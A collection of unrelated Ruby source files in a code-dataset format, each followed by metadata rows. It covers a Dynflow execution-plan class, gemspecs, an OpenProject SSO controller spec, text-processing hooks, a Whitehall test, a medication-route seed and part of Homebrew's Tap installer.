persistence.find_execution_plan_counts(filters: { 'caller_execution_plan_id' => self.id })
end
# Id of the plan to execute in order to rescue from failure, or nil when
# no rescue is possible. Side effects depend on the strategy: Fail moves
# the plan to :stopped; Skip marks the failed steps (and their
# dependents) as skipped so this very plan can be re-run.
def rescue_plan_id
case rescue_strategy
when Action::Rescue::Pause
nil
when Action::Rescue::Fail
update_state :stopped
nil
when Action::Rescue::Skip
failed_steps.each { |step| self.skip(step) }
self.id
end
end
# All plan-phase steps.
def plan_steps
steps_of_type(Dynflow::ExecutionPlan::Steps::PlanStep)
end
# All run-phase steps.
def run_steps
steps_of_type(Dynflow::ExecutionPlan::Steps::RunStep)
end
# All finalize-phase steps.
def finalize_steps
steps_of_type(Dynflow::ExecutionPlan::Steps::FinalizeStep)
end
# Steps currently in the :error state.
def failed_steps
steps_in_state(:error)
end
# All steps whose state is one of +states+.
def steps_in_state(*states)
  steps.values.select { |step| states.include?(step.state) }
end
# Executes the rescue plan determined by the rescue strategy; raises
# Errors::RescueError when there is no plan to rescue with.
def rescue_from_error
if rescue_plan_id = self.rescue_plan_id
@world.execute(rescue_plan_id)
else
raise Errors::RescueError, 'Unable to rescue from the error'
end
end
# Monotonically increasing id for actions within this plan (starts at 1).
def generate_action_id
@last_action_id ||= 0
@last_action_id += 1
end
# Monotonically increasing id for steps within this plan (starts at 1).
def generate_step_id
@last_step_id ||= 0
@last_step_id += 1
end
# Schedules the plan to run later according to +delay_options+
# (:start_at, optional :start_before and :frozen). The ensure clause
# always finalizes the state: :stopped when building the scheduling step
# failed, :scheduled otherwise.
def delay(caller_action, action_class, delay_options, *args)
save
@root_plan_step = add_scheduling_step(action_class, caller_action)
execution_history.add("delay", @world.id)
serializer = root_plan_step.delay(delay_options, args)
delayed_plan = DelayedPlan.new(@world,
id,
delay_options[:start_at],
delay_options.fetch(:start_before, nil),
serializer,
delay_options[:frozen] || false)
persistence.save_delayed_plan(delayed_plan)
ensure
update_state(error? ? :stopped : :scheduled)
end
# Lazily loaded persistence record of this plan's delayed execution.
def delay_record
@delay_record ||= persistence.load_delayed_plan(id)
end
# Persists the plan shell and creates the root plan step for
# +action_class+. Only the :caller_action option is accepted.
def prepare(action_class, options = {})
options = options.dup
caller_action = Type! options.delete(:caller_action), Dynflow::Action, NilClass
raise "Unexpected options #{options.keys.inspect}" unless options.empty?
save
@root_plan_step = add_plan_step(action_class, caller_action)
@root_plan_step.save
end
# Runs the planning phase: executes the root plan step (wrapped by the
# :plan_phase middleware), collapses a single-item run flow, persists all
# steps and moves the plan to :planned — or :stopped when planning erred.
def plan(*args)
update_state(:planning)
world.middleware.execute(:plan_phase, root_plan_step.action_class, self) do
with_planning_scope do
root_action = root_plan_step.execute(self, nil, false, *args)
@label = root_action.label
if @dependency_graph.unresolved?
raise "Some dependencies were not resolved: #{@dependency_graph.inspect}"
end
end
end
# a concurrence flow with a single sub-flow is redundant — unwrap it
if @run_flow.size == 1
@run_flow = @run_flow.sub_flows.first
end
steps.values.each(&:save)
update_state(error? ? :stopped : :planned)
end
# sends the cancel event to all currently running and cancellable steps.
# if the plan is just scheduled, it cancels it (and returns an one-item
# array with the future value of the cancel result)
def cancel(force = false)
if state == :scheduled
# not started yet: cancel the delayed-plan record directly, wrapping
# the result in a future to keep the return shape uniform
[Concurrent.future.tap { |f| f.success delay_record.cancel }]
else
event = force ? ::Dynflow::Action::Cancellable::Abort : ::Dynflow::Action::Cancellable::Cancel
steps_to_cancel.map do |step|
world.event(id, step.id, event)
end
end
end
# A plan can be cancelled while still scheduled, or while running with at
# least one cancellable step in flight.
def cancellable?
  return true if state == :scheduled

  state == :running && steps_to_cancel.any?
end
# Running or suspended steps whose action supports cancellation.
def steps_to_cancel
  steps_in_state(:running, :suspended).select do |step|
    step.action(self).is_a?(::Dynflow::Action::Cancellable)
  end
end
# Marks the given step — and everything transitively depending on it — as
# skipped, persists the plan and returns the affected steps.
def skip(step)
  affected_steps = steps_to_skip(step)
  affected_steps.each(&:mark_to_skip)
  save
  affected_steps
end
# All the steps that need to get skipped when wanting to skip the step
# includes the step itself, all steps dependent on it (even transitively)
# FIND maybe move to persistence to let adapter to do it effectively?
# @return [Array<Steps::Abstract>]
def steps_to_skip(step)
  # steps that (directly) require the skipped step must be skipped as well
  dependent_steps = steps.values.find_all do |s|
    next if s.is_a? Steps::PlanStep

    action = persistence.load_action(s)
    action.required_step_ids.include?(step.id)
  end

  # recurse so transitive dependents are collected too
  steps_to_skip = dependent_steps.map do |dependent_step|
    steps_to_skip(dependent_step)
  end.flatten

  steps_to_skip << step

  # a run step drags its finalize step along
  if step.is_a? Steps::RunStep
    finalize_step_id = persistence.load_action(step).finalize_step_id
    steps_to_skip << steps[finalize_step_id] if finalize_step_id
  end

  return steps_to_skip.uniq
end
# @api private
# All steps of the plan that are instances of the given step class.
def steps_of_type(type)
  steps.values.select { |s| s.is_a?(type) }
end
# The innermost flow currently being built during planning
# (top of the flow stack maintained by #switch_flow).
def current_run_flow
  @run_flow_stack.last
end
# @api private
# Sets up the planning state (flow stack and dependency graph) for the
# duration of the block and tears it down afterwards.
def with_planning_scope(&block)
  @run_flow_stack = []
  @dependency_graph = DependencyGraph.new
  switch_flow(run_flow, &block)
ensure
  # always clear the planning state, even when planning raises
  @run_flow_stack = nil
  @dependency_graph = nil
end
# @api private
# Switches the flow type (Sequence, Concurrence) to be used within the block.
def switch_flow(new_flow, &block)
  @run_flow_stack << new_flow
  return block.call
ensure
  # pop the flow and merge it into the parent flow (if any), resolving the
  # dependencies that were collected while the block ran
  @run_flow_stack.pop
  current_run_flow.add_and_resolve(@dependency_graph, new_flow) if current_run_flow
end
# Creates the plan step used for a delayed (scheduled) execution and
# initializes its action. Returns the new step.
def add_scheduling_step(action_class, caller_action = nil)
  step = add_step(Steps::PlanStep, action_class, generate_action_id, :scheduling)
  step.initialize_action(caller_action)
  step
end
# Creates a plan step for the given action class, wiring it up as a child
# of the caller's plan step when the caller belongs to this plan.
def add_plan_step(action_class, caller_action = nil)
  add_step(Steps::PlanStep, action_class, generate_action_id).tap do |step|
    # TODO: to be removed and preferred by the caller_action
    if caller_action && caller_action.execution_plan_id == self.id
      @steps[caller_action.plan_step_id].children << step.id
    end
    step.initialize_action(caller_action)
  end
end
# Creates a run step for the action and inserts it into the current flow
# according to the dependencies the action declares.
def add_run_step(action)
  add_step(Steps::RunStep, action.class, action.id).tap do |step|
    step.update_from_action(action)
    @dependency_graph.add_dependencies(step, action)
    current_run_flow.add_and_resolve(@dependency_graph, Flows::Atom.new(step.id))
  end
end
# Creates a finalize step for the action and appends it to the finalize
# flow. Returns the new step.
def add_finalize_step(action)
  step = add_step(Steps::FinalizeStep, action.class, action.id)
  step.update_from_action(action)
  finalize_flow << Flows::Atom.new(step.id)
  step
end
# Serializes this execution plan into a hash for persistence.
def to_hash
  recursive_to_hash id:                id,
                    class:             self.class.to_s,
                    label:             label,
                    state:             state,
                    result:            result,
                    root_plan_step_id: root_plan_step && root_plan_step.id,
                    run_flow:          run_flow,
                    finalize_flow:     finalize_flow,
                    step_ids:          steps.map { |id, _| id },
                    started_at:        time_to_str(started_at),
                    ended_at:          time_to_str(ended_at),
                    execution_time:    execution_time,
                    real_time:         real_time,
                    execution_history: execution_history.to_hash
end
# Persists this execution plan through the world's persistence adapter.
def save
  persistence.save_execution_plan(self)
end
# Deserializes an execution plan from its persisted hash representation.
# On failure an InvalidPlan stub is returned instead of raising, so a
# corrupted plan can still be listed and inspected.
def self.new_from_hash(hash, world)
  check_class_matching hash
  execution_plan_id = hash[:id]
  steps = steps_from_hash(hash[:step_ids], execution_plan_id, world)
  self.new(world,
           execution_plan_id,
           hash[:label],
           hash[:state],
           steps[hash[:root_plan_step_id]],
           Flows::Abstract.from_hash(hash[:run_flow]),
           Flows::Abstract.from_hash(hash[:finalize_flow]),
           steps,
           string_to_time(hash[:started_at]),
           string_to_time(hash[:ended_at]),
           hash[:execution_time].to_f,
           hash[:real_time].to_f,
           ExecutionHistory.new_from_hash(hash[:execution_history]))
rescue => plan_exception
  begin
    # first fallback: keep as much metadata as can still be read
    world.logger.error("Could not load execution plan #{execution_plan_id}")
    world.logger.error(plan_exception)
    InvalidPlan.new(plan_exception, execution_plan_id,
                    hash[:label],
                    hash[:state],
                    string_to_time(hash[:started_at]),
                    string_to_time(hash[:ended_at]),
                    hash[:execution_time].to_f,
                    hash[:real_time].to_f,
                    ExecutionHistory.new_from_hash(hash[:execution_history]))
  rescue => invalid_plan_exception
    # last resort: a bare stub with just label and state
    world.logger.error("Could not even load a fallback execution plan for #{execution_plan_id}")
    world.logger.error(invalid_plan_exception)
    InvalidPlan.new(invalid_plan_exception, execution_plan_id,
                    hash[:label],
                    hash[:state])
  end
end
# Total execution time of the plan: the sum of the execution times of all
# steps (steps without a recorded time count as zero).
def compute_execution_time
  total = 0
  self.steps.values.each do |step|
    total += step.execution_time || 0
  end
  total
end
# @return [0..1] the percentage of the progress. See Action::Progress for more
# info
def progress
  return 0 if [:pending, :planning, :scheduled].include?(state)

  flow_step_ids = run_flow.all_step_ids + finalize_flow.all_step_ids
  # weighted average of per-step progress across all run/finalize steps
  plan_done, plan_total = flow_step_ids.reduce([0.0, 0]) do |(done, total), step_id|
    step = self.steps[step_id]
    [done + (step.progress_done * step.progress_weight),
     total + step.progress_weight]
  end
  # a plan with zero total weight is considered fully done
  plan_total > 0 ? (plan_done / plan_total) : 1
end
# @return [Action] the root action of this plan, in Present phase (memoized)
def entry_action
  @entry_action ||= root_plan_step.action(self)
end
# @return [Array<Action>] actions in Present phase
# All actions in Present phase: the entry action plus every action it
# planned (memoized).
def actions
  @actions ||= [entry_action] + entry_action.all_planned_actions
end
# Id of the execution plan that triggered this one (through the entry
# action), or nil when the plan was triggered directly.
def caller_execution_plan_id
  entry_action.caller_execution_plan_id
end
private
# Shortcut to the world's persistence adapter.
def persistence
  world.persistence
end
# Instantiates a step of the given class, registers it in the plan's step
# table and returns it.
def add_step(step_class, action_class, action_id, state = :pending)
  step_class.new(self.id,
                 self.generate_step_id,
                 state,
                 action_class,
                 action_id,
                 nil,
                 world).tap do |new_step|
    @steps[new_step.id] = new_step
  end
end
# Loads the plan's steps from persistence and returns them as an ordered
# hash keyed by integer step id, preserving the order given by step_ids.
def self.steps_from_hash(step_ids, execution_plan_id, world)
  loaded_steps = world.persistence.load_steps(execution_plan_id, world)
  by_id = {}
  loaded_steps.each { |loaded_step| by_id[loaded_step.id.to_i] = loaded_step }

  step_ids.each_with_object({}) do |step_id, ordered|
    step = by_id[step_id.to_i]
    if step.nil?
      raise Errors::DataConsistencyError, "Could not load steps for execution plan #{execution_plan_id}"
    else
      ordered[step_id.to_i] = step
    end
  end
end
# Releases every singleton-action lock owned by this execution plan.
def unlock_all_singleton_locks!
  filter = { :owner_id => 'execution-plan:' + self.id,
             :class => Dynflow::Coordinator::SingletonActionLock.to_s }
  world.coordinator.find_locks(filter).each do |lock|
    world.coordinator.release(lock)
  end
end
private_class_method :steps_from_hash
end
# rubocop:enable Metrics/ClassLength
end
| 32.614414 | 108 | 0.597591 |
2855f6835f9c0b182658499115261bab85cd736c | 1,484 |
# Make lib/ loadable so the version constant can be required below.
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "this_day_in_history/version"

Gem::Specification.new do |spec|
  spec.name          = "this_day_in_history"
  spec.version       = ThisDayInHistory::VERSION
  spec.authors       = ["Jeremiah Lutes"]
  spec.email         = ["[email protected]"]

  spec.summary       = "Scraper CLI that pulls a list of historical events from History.com"
  #spec.description  = %q{TODO: Write a longer description or delete this line.}
  spec.homepage      = "https://github.com/81Jeremiah/this_day_in_history-cli-app"
  spec.license       = "MIT"

  # Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
  # to allow pushing to a single host or delete this section to allow pushing to any host.
  # if spec.respond_to?(:metadata)
  #   spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
  # else
  #   raise "RubyGems 2.0 or newer is required to protect against " \
  #     "public gem pushes."
  # end

  # Package every git-tracked file except tests/specs/features.
  spec.files = `git ls-files -z`.split("\x0").reject do |f|
    f.match(%r{^(test|spec|features)/})
  end
  spec.bindir        = "exe"
  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
  spec.require_paths = ["lib"]

  spec.add_development_dependency "bundler", "~> 1.16"
  spec.add_development_dependency "rake", "~> 10.0"
  spec.add_development_dependency "rspec", "~> 3.0"
end
| 40.108108 | 96 | 0.673854 |
1a0d315310831b2f4109afe39ceecfd07dd9f31d | 5,528 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
# Controller specs for header-based auth-source single sign-on (SSO):
# a trusted reverse proxy sends "login:secret" in a configurable header.
describe MyController, type: :controller do
  render_views

  let(:sso_config) do
    {
      header: header,
      secret: secret
    }
  end

  let(:header) { "X-Remote-User" }
  let(:secret) { "42" }

  let!(:auth_source) { DummyAuthSource.create name: "Dummy LDAP" }
  let!(:user) { FactoryBot.create :user, login: login, auth_source_id: auth_source.id, last_login_on: 5.days.ago }
  let(:login) { "h.wurst" }

  # Shared behaviour for requests where SSO cannot log the user in.
  shared_examples "auth source sso failure" do
    def attrs(user)
      user.attributes.slice(:login, :mail, :auth_source_id)
    end

    it "should redirect to AccountController#sso to show the error" do
      expect(response).to redirect_to "/sso"

      failure = session[:auth_source_sso_failure]
      expect(failure).to be_present

      expect(attrs(failure[:user])).to eq attrs(user)

      expect(failure[:login]).to eq login
      expect(failure[:back_url]).to eq "http://test.host/my/account"
      expect(failure[:ttl]).to eq 1
    end

    context 'when the config is marked optional' do
      let(:sso_config) do
        {
          header: header,
          secret: secret,
          optional: true
        }
      end

      it "should redirect to login" do
        expect(response).to redirect_to("/login?back_url=http%3A%2F%2Ftest.host%2Fmy%2Faccount")
      end
    end
  end

  before do
    if sso_config
      allow(OpenProject::Configuration)
        .to receive(:auth_source_sso)
        .and_return(sso_config)
    end

    # Simulate the proxy-set SSO header ("login:secret", or bare login
    # when no secret is configured) on every request.
    separator = secret ? ':' : ''
    request.headers[header] = "#{login}#{separator}#{secret}"
  end

  describe 'login' do
    before do
      get :account
    end

    it "should log in given user" do
      expect(response).to redirect_to my_page_path
      expect(session[:user_id]).to eq user.id
    end

    context 'when the secret being null' do
      let(:secret) { nil }

      it "should log in given user" do
        expect(response).to redirect_to my_page_path
        expect(user.reload.last_login_on).to be_within(10.seconds).of(Time.now)
        expect(session[:user_id]).to eq user.id
      end
    end

    context 'when the user is invited' do
      let!(:user) do
        FactoryBot.create :user, login: login, status: Principal.statuses[:invited], auth_source_id: auth_source.id
      end

      it "should log in given user and activate it" do
        expect(response).to redirect_to my_page_path
        expect(user.reload).to be_active
        expect(session[:user_id]).to eq user.id
      end
    end

    context "with no auth source sso configured" do
      let(:sso_config) { nil }

      it "should redirect to login" do
        expect(response).to redirect_to("/login?back_url=http%3A%2F%2Ftest.host%2Fmy%2Faccount")
      end
    end

    context "with a non-active user user" do
      let(:user) { FactoryBot.create :user, login: login, auth_source_id: auth_source.id, status: 2 }

      it_should_behave_like "auth source sso failure"
    end

    context "with an invalid user" do
      let(:auth_source) { DummyAuthSource.create name: "Onthefly LDAP", onthefly_register: true }

      # On-the-fly registration fails because the mail is already taken.
      let!(:duplicate) { FactoryBot.create :user, mail: "[email protected]" }

      let(:login) { "dummy_dupuser" }
      let(:user) do
        FactoryBot.build :user, login: login, mail: duplicate.mail, auth_source_id: auth_source.id
      end

      it_should_behave_like "auth source sso failure"
    end
  end

  context 'when the logged-in user differs from the header' do
    let(:other_user) { FactoryBot.create :user, login: 'other_user' }
    let(:session_update_time) { 1.minute.ago }
    let(:service) { Users::LogoutService.new(controller: controller) }

    before do
      session[:user_id] = other_user.id
      session[:updated_at] = session_update_time
    end

    it 'logs out the user and logs it in again' do
      allow(::Users::LogoutService).to receive(:new).and_return(service)
      allow(service).to receive(:call).with(other_user).and_call_original

      get :account

      # the previously logged-in user must be logged out first
      expect(service).to have_received(:call).with(other_user)

      expect(response).to redirect_to my_page_path
      expect(user.reload.last_login_on).to be_within(10.seconds).of(Time.now.utc)
      expect(session[:user_id]).to eq user.id
      expect(session[:updated_at]).to be > session_update_time
    end
  end
end
| 31.409091 | 115 | 0.681802 |
5dd44e4091a91b657b3c90523ee25eaf334ef49b | 1,255 | module Hoox
# Public: A hook to tokenize tab symbols before hook delegation
class TabHideHook < Hoox::Hook
  def initialize
    # Placeholder token substituted for tab characters.
    @tab_subst="~!~ "
  end

  # Replace every tab with the placeholder token (mutates arg in place;
  # gsub! is a no-op when there are no tabs).
  def preprocess(arg)
    arg.gsub!(/\t/, @tab_subst)
    arg
  end

  # Restore placeholder tokens back to tabs.
  def postprocess(arg)
    arg.gsub!(@tab_subst, "\t")
    arg
  end
end
# Public: Strip away pre code tags for processing, and
# restore upon exit
class HtmlPreElementHideHook < Hoox::RegexHideHook
  def initialize
    # Pattern source (no delimiters) matching a whole <pre>...</pre>
    # element; consumed by RegexHideHook#initialize via `super`.
    @regex = "<pre.*?<\/pre>"
    super
  end
end
# Public: Hide all HTML tags from downstream hooks
class HtmlTagToken < Hoox::RegexHideHook
  def initialize
    # Pattern source matching any HTML open/close tag.
    # NOTE: the previous value embedded literal "/.../" delimiters inside
    # the string, so the pattern could never match a bare HTML tag; sibling
    # hooks (e.g. HtmlPreElementHideHook) pass the bare pattern source
    # without delimiters.
    @regex = "<\/?[^>]*?>"
    super
  end
end
class MarkdownHyperlinkHook < Hoox::Hook
  # Applicable only when the text contains a Markdown link token.
  def applies(arg)
    arg.include? "]("
  end

  # Replace every Markdown link `[text](url)` with an HTML anchor element
  # (mutates arg in place and returns it).
  def execute(arg)
    arg.gsub!(/\[(.*?)\]\((.*?)\)/) { "<a href=\"#{$2}\">#{$1}</a>" }
    arg
  end
end
end
| 21.637931 | 65 | 0.58008 |
2145d085fa6405792d83ae5bf38717a2aaa5ce94 | 851 | require 'test_helper'
# Verifies that AnnouncementClearer removes a statistics announcement from
# the search index when its statistics edition changes, and is a no-op for
# editions without an announcement.
class AnnouncementClearerTest < ActiveSupport::TestCase
  test '#clear! any associated announcement from the search index' do
    announcement = create(:statistics_announcement)
    statistics = create(:published_statistics,
                        statistics_announcement: announcement)
    # the announcement must be deleted from the search index
    Whitehall::SearchIndex.expects(:delete).with(announcement)
    ServiceListeners::AnnouncementClearer.new(statistics).clear!
  end

  test '#clear! does not raise an error if the edition does not have an announcement' do
    statistics = create(:published_statistics)
    ServiceListeners::AnnouncementClearer.new(statistics).clear!
  end

  test '#clear! does not raise an error if the edition is not a statistical publication' do
    statistics = create(:published_case_study)
    ServiceListeners::AnnouncementClearer.new(statistics).clear!
  end
end
| 37 | 91 | 0.777908 |
33d24cfa4d8ce212bf6b95b3153b643a44969b8c | 1,415 | # frozen_string_literal: true
# Make lib/ loadable so the version constant can be required below.
lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'guard/kibit/version'

Gem::Specification.new do |spec|
  spec.name          = 'guard-kibit'
  spec.version       = GuardKibitVersion.to_s
  spec.authors       = ['Eric Musgrove']
  spec.email         = ['[email protected]']
  spec.summary       = 'Guard plugin for Kibit'
  spec.description   = 'Guard::Kibit automatically checks Clojure code style with Kibit ' \
                       'when files are modified.'
  spec.homepage      = 'https://github.com/tenpaiyomi/guard-kibit'
  spec.license       = 'MIT'

  # Package every git-tracked file; executables come from bin/, tests from spec/.
  spec.files         = `git ls-files`.split($INPUT_RECORD_SEPARATOR)
  spec.executables   = spec.files.grep(/^bin\//) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(/^spec\//)
  spec.require_paths = ['lib']

  spec.add_dependency 'guard', '~> 2.1'
  spec.add_dependency 'guard-compat', '~> 1.1'

  spec.add_development_dependency 'bundler', '~> 1.3'
  spec.add_development_dependency 'guard-rspec', '>= 4.2.3', '< 5.0'
  spec.add_development_dependency 'guard-rubocop', '~> 1.3.0'
  spec.add_development_dependency 'rake', '~> 12.0'
  spec.add_development_dependency 'rspec', '~> 3.0'
  spec.add_development_dependency 'rubocop', '~> 0.20'
  spec.add_development_dependency 'simplecov', '~> 0.7'
end
| 40.428571 | 91 | 0.646643 |
38855f2e85aed6c0fde33e276c00ab6faea16f24 | 1,446 | # frozen_string_literal: true
module Renalware
  log "Adding Medication Routes" do
    # UK Renal Registry route codes referenced by the seed data below.
    module RR
      ORAL            = 1
      TOPICAL         = 2
      INHALATION      = 3
      INJECTION       = 4
      INTRAPERITONEAL = 5
      OTHER           = 9
    end

    MRoute = Medications::MedicationRoute

    # Idempotent seed: find_or_create_by! makes re-running the seeds safe.
    MRoute.transaction do
      MRoute.find_or_create_by!(code: "PO", name: "Per Oral", rr_code: RR::ORAL)
      MRoute.find_or_create_by!(code: "IV", name: "Intravenous", rr_code: RR::INJECTION)
      MRoute.find_or_create_by!(code: "SC", name: "Subcutaneous", rr_code: RR::INJECTION)
      MRoute.find_or_create_by!(code: "IM", name: "Intramuscular", rr_code: RR::INJECTION)
      MRoute.find_or_create_by!(code: "IP", name: "Intraperitoneal", rr_code: RR::INTRAPERITONEAL)
      MRoute.find_or_create_by!(code: "INH", name: "Inhaler", rr_code: RR::INHALATION)
      MRoute.find_or_create_by!(code: "SL", name: "Sublingual", rr_code: RR::OTHER)
      MRoute.find_or_create_by!(code: "NG", name: "Nasogastric", rr_code: RR::OTHER)
      MRoute.find_or_create_by!(code: "PARENT", name: "Parenteral", rr_code: RR::INJECTION)
      MRoute.find_or_create_by!(code: "PERCUT", name: "Percutaneous", rr_code: RR::OTHER)
      MRoute.find_or_create_by!(code: "TOP", name: "Topical", rr_code: RR::TOPICAL)
      MRoute.find_or_create_by!(code: "OTHER", name: "Other", rr_code: RR::OTHER)
      MRoute.find_or_create_by!(code: "PR", name: "PerRectum", rr_code: RR::OTHER)
    end
  end
end
| 45.1875 | 98 | 0.67704 |
1138cf6149da96c102380ec640bd8cbf7fe0c449 | 18,123 | # frozen_string_literal: true
require "commands"
require "extend/cachable"
require "readall"
require "description_cache_store"
# A {Tap} is used to extend the formulae provided by Homebrew core.
# Usually, it's synced with a remote git repository. And it's likely
# a GitHub repository with the name of `user/homebrew-repo`. In such
# case, `user/repo` will be used as the {#name} of this {Tap}, where
# {#user} represents GitHub username and {#repo} represents repository
# name without leading `homebrew-`.
class Tap
  extend Cachable

  TAP_DIRECTORY = (HOMEBREW_LIBRARY/"Taps").freeze

  # Fetches the (cached) {Tap} for a "user/repo" string or separate
  # user/repo arguments; returns the {CoreTap} singleton for the core tap.
  def self.fetch(*args)
    case args.length
    when 1
      user, repo = args.first.split("/", 2)
    when 2
      user = args.first
      repo = args.second
    end

    raise "Invalid tap name '#{args.join("/")}'" if [user, repo].any? { |part| part.nil? || part.include?("/") }

    # We special case homebrew and linuxbrew so that users don't have to shift in a terminal.
    user = user.capitalize if ["homebrew", "linuxbrew"].include? user
    repo = repo.sub(HOMEBREW_OFFICIAL_REPO_PREFIXES_REGEX, "")

    return CoreTap.instance if ["Homebrew", "Linuxbrew"].include?(user) && ["core", "homebrew"].include?(repo)

    cache_key = "#{user}/#{repo}".downcase
    cache.fetch(cache_key) { |key| cache[key] = Tap.new(user, repo) }
  end

  # Resolves a filesystem path inside TAP_DIRECTORY back to its {Tap}.
  # @return [Tap, nil] nil when the path does not belong to a tap
  def self.from_path(path)
    match = File.expand_path(path).match(HOMEBREW_TAP_PATH_REGEX)
    raise "Invalid tap path '#{path}'" unless match

    fetch(match[:user], match[:repo])
  rescue
    # No need to error as a nil tap is sufficient to show failure.
    nil
  end

  def self.default_cask_tap
    @default_cask_tap ||= fetch("Homebrew", "cask")
  end

  extend Enumerable

  # The user name of this {Tap}. Usually, it's the GitHub username of
  # this {Tap}'s remote repository.
  attr_reader :user

  # The repository name of this {Tap} without leading `homebrew-`.
  attr_reader :repo

  # The name of this {Tap}. It combines {#user} and {#repo} with a slash.
  # {#name} is always in lowercase.
  # e.g. `user/repo`
  attr_reader :name

  # The full name of this {Tap}, including the `homebrew-` prefix.
  # It combines {#user} and 'homebrew-'-prefixed {#repo} with a slash.
  # e.g. `user/homebrew-repo`
  attr_reader :full_name

  # The local path to this {Tap}.
  # e.g. `/usr/local/Library/Taps/user/homebrew-repo`
  attr_reader :path

  # @private
  def initialize(user, repo)
    @user = user
    @repo = repo
    @name = "#{@user}/#{@repo}".downcase
    @full_name = "#{@user}/homebrew-#{@repo}"
    @path = TAP_DIRECTORY/@full_name.downcase
    @path.extend(GitRepositoryExtension)
    @alias_table = nil
    @alias_reverse_table = nil
  end

  # Clear internal cache
  def clear_cache
    @remote = nil
    @repo_var = nil
    @formula_dir = nil
    @cask_dir = nil
    @command_dir = nil
    @formula_files = nil
    @alias_dir = nil
    @alias_files = nil
    @aliases = nil
    @alias_table = nil
    @alias_reverse_table = nil
    @command_files = nil
    @formula_renames = nil
    @tap_migrations = nil
    @config = nil
    remove_instance_variable(:@private) if instance_variable_defined?(:@private)
  end

  # The remote path to this {Tap}.
  # e.g. `https://github.com/user/homebrew-repo`
  def remote
    raise TapUnavailableError, name unless installed?

    @remote ||= path.git_origin
  end

  # The default remote path to this {Tap}.
  def default_remote
    "https://github.com/#{full_name}"
  end

  # Environment-variable-safe identifier derived from the tap path.
  def repo_var
    @repo_var ||= path.to_s
                      .delete_prefix(TAP_DIRECTORY.to_s)
                      .tr("^A-Za-z0-9", "_")
                      .upcase
  end

  # True if this {Tap} is a git repository.
  def git?
    path.git?
  end

  # git branch for this {Tap}.
  def git_branch
    raise TapUnavailableError, name unless installed?

    path.git_branch
  end

  # git HEAD for this {Tap}.
  def git_head
    raise TapUnavailableError, name unless installed?

    path.git_head
  end

  # git HEAD in short format for this {Tap}.
  def git_short_head
    raise TapUnavailableError, name unless installed?

    path.git_short_head
  end

  # Time since git last commit for this {Tap}.
  def git_last_commit
    raise TapUnavailableError, name unless installed?

    path.git_last_commit
  end

  # git last commit date for this {Tap}.
  def git_last_commit_date
    raise TapUnavailableError, name unless installed?

    path.git_last_commit_date
  end

  # The issues URL of this {Tap}.
  # e.g. `https://github.com/user/homebrew-repo/issues`
  def issues_url
    return unless official? || !custom_remote?

    "#{default_remote}/issues"
  end

  def to_s
    name
  end

  # Human-readable revision information for version-style output.
  def version_string
    return "N/A" unless installed?

    pretty_revision = git_short_head
    return "(no git repository)" unless pretty_revision

    "(git revision #{pretty_revision}; last commit #{git_last_commit_date})"
  end

  # True if this {Tap} is an official Homebrew tap.
  def official?
    user == "Homebrew"
  end

  # True if the remote of this {Tap} is a private repository.
  def private?
    return @private if instance_variable_defined?(:@private)

    @private = read_or_set_private_config
  end

  # {TapConfig} of this {Tap}
  def config
    @config ||= begin
      raise TapUnavailableError, name unless installed?

      TapConfig.new(self)
    end
  end

  # True if this {Tap} has been installed.
  def installed?
    path.directory?
  end

  # True if this {Tap} is not a full clone.
  def shallow?
    (path/".git/shallow").exist?
  end

  # @private
  def core_tap?
    false
  end

  # Install this {Tap}.
  #
  # @param clone_target [String] If passed, it will be used as the clone remote.
  # @param force_auto_update [Boolean, nil] If present, whether to override the
  #   logic that skips non-GitHub repositories during auto-updates.
  # @param full_clone [Boolean] If set as true, full clone will be used. If unset/nil, means "no change".
  # @param quiet [Boolean] If set, suppress all output.
  def install(full_clone: true, quiet: false, clone_target: nil, force_auto_update: nil)
    require "descriptions"

    if official? && DEPRECATED_OFFICIAL_TAPS.include?(repo)
      odie "#{name} was deprecated. This tap is now empty and all its contents were either deleted or migrated."
    elsif user == "caskroom"
      new_repo = repo == "cask" ? "cask" : "cask-#{repo}"
      odie "#{name} was moved. Tap homebrew/#{new_repo} instead."
    end

    requested_remote = clone_target || default_remote

    if installed?
      raise TapRemoteMismatchError.new(name, @remote, requested_remote) if clone_target && requested_remote != remote
      raise TapAlreadyTappedError, name if force_auto_update.nil? && !shallow?
    end

    # ensure git is installed
    Utils.ensure_git_installed!

    if installed?
      unless force_auto_update.nil?
        config["forceautoupdate"] = force_auto_update
        return if !full_clone || !shallow?
      end

      # already tapped as a shallow clone: deepen it instead of re-cloning
      ohai "Unshallowing #{name}" unless quiet
      args = %w[fetch --unshallow]
      args << "-q" if quiet
      path.cd { safe_system "git", *args }
      return
    end

    clear_cache

    ohai "Tapping #{name}" unless quiet
    args = %W[clone #{requested_remote} #{path}]
    args << "--depth=1" unless full_clone
    args << "-q" if quiet

    begin
      safe_system "git", *args

      unless Readall.valid_tap?(self, aliases: true)
        raise "Cannot tap #{name}: invalid syntax in tap!" unless Homebrew::EnvConfig.developer?
      end
    rescue Interrupt, RuntimeError
      ignore_interrupts do
        # wait for git to possibly cleanup the top directory when interrupt happens.
        sleep 0.1
        FileUtils.rm_rf path
        path.parent.rmdir_if_possible
      end
      raise
    end

